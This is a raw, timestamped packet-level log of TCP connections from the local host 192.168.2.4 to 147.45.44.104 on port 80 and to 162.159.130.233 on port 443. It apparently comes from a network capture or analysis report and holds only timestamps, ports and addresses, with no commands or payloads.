Aug 10, 2024 16:12:23.486830950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.486830950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487021923 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487032890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487041950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487046957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487060070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487095118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487095118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487128973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487140894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487149000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487158060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487168074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487174034 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487178087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487186909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487195969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487207890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487220049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487220049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487257004 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487257004 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487849951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487859011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487868071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487878084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487889051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487905979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487915993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487921953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487924099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487938881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487948895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487957954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.487958908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487970114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487979889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487989902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.487999916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488007069 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488007069 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488009930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488014936 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488018990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488025904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488028049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488065958 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488076925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488754988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488765001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488773108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488782883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488796949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488807917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488818884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488830090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488838911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488854885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488854885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488854885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488854885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488859892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488872051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488882065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.488928080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488928080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.488928080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489335060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489345074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489365101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489375114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489384890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489391088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489393950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489404917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489414930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489422083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489422083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489434958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489444971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489454031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489463091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489473104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489475012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489475012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489481926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489491940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489502907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489512920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489514112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489514112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489522934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.489573956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.489573956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490295887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490305901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490314007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490324020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490335941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490345001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490354061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490365028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490372896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490381956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490381956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490381956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490384102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490394115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490402937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490420103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490422010 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490431070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490442038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490452051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490457058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490457058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490462065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490472078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490490913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490502119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.490533113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490534067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490534067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490534067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.490549088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.491103888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491115093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491122961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491132975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491142988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491152048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491161108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491170883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491182089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.491202116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.491202116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.491260052 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.491260052 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506401062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506434917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506477118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506498098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506565094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506597042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506658077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506686926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506716967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506750107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506771088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506771088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506798983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506827116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506866932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.506880999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506932974 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.506978989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507010937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507041931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507064104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507085085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507116079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507148027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507179976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507199049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507230997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507272959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507286072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507302999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507323980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507348061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507378101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507411003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507430077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507455111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507479906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507513046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507544041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507563114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507597923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507646084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507677078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507702112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507729053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507762909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507781982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507812023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507853031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507900953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.507936954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.507956982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508021116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508054018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508085012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508116961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508136034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508161068 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508187056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508217096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508250952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508270025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508289099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508316994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508358955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508384943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508441925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508455992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508502960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508518934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508549929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508569956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508599997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508625031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508641005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508667946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508714914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508749008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508780956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508814096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508832932 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508862019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508882046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508913994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508944035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.508965015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.508990049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509015083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509051085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509082079 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509103060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509150982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509182930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509215117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509248018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509268045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509289980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509341002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509361982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509394884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509411097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509443045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509474039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509495020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509526014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509557009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509577036 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509605885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509637117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509655952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509685040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509706020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509740114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509771109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509797096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.509831905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.509885073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510040998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510071993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510092020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510138035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510164976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510210037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510210037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510286093 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.510332108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510364056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510382891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510396004 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.510411978 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.510415077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510435104 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510468006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510490894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510508060 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.510524988 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.510528088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510533094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.510544062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510572910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510577917 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.510587931 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.510595083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510611057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510641098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510672092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510693073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510723114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510765076 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510777950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510797977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510816097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510844946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510875940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510907888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510940075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.510966063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.510987043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511012077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511043072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511068106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511090994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511116028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511147976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511181116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511200905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511225939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511257887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511296034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511539936 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.511610985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511636972 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.511642933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511673927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511691093 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.511702061 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.511708975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511720896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511729002 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.511733055 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.511749029 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.511749983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511764050 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.511769056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511791945 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.511797905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511815071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511843920 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.511847019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511850119 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.511866093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.511873960 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.511894941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511919022 CEST	49739	80	192.168.2.4	147.45.44.104
